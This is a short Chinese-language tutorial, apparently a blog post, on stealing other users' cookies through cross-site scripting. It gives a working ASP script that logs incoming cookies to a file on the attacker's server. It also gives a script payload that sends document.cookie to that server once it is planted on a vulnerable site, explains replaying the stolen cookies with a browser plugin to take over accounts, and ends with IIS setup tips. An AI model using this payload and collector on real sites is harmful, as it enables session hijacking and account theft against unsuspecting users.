首先准备一个获取cookie的asp脚本
<html>
<title>test</title>
<body>
<%testfile = Server.MapPath("code.txt")
msg = Request("msg")
set fs = server.CreateObject("scripting.filesystemobject")
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close()
set fs = nothing%>
</body>
</html>
然后把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。为了测试我自己在IIS下搭了个网站,所以我的xss语句为:
<script>window.open('http://localhost:8000/cookie.asp?msg='+document.cookie)</script>
将该语句输入到有xss漏洞的网站中输入保存,当其他用户打开该页面后,就会触发,然后当前账户的cookie信息就当成参数发到你的网站下的文件里了。
接下来就可以利用如EditThisCookie等插件进行cookie的替换。
另外过程中可能会出现IIS报错无法执行脚本文件的问题,大概率是因为你没有安装ASP。解决方法如下:
1.打开windows功能安装ASP
2.IIS下设置ASP,启用父路径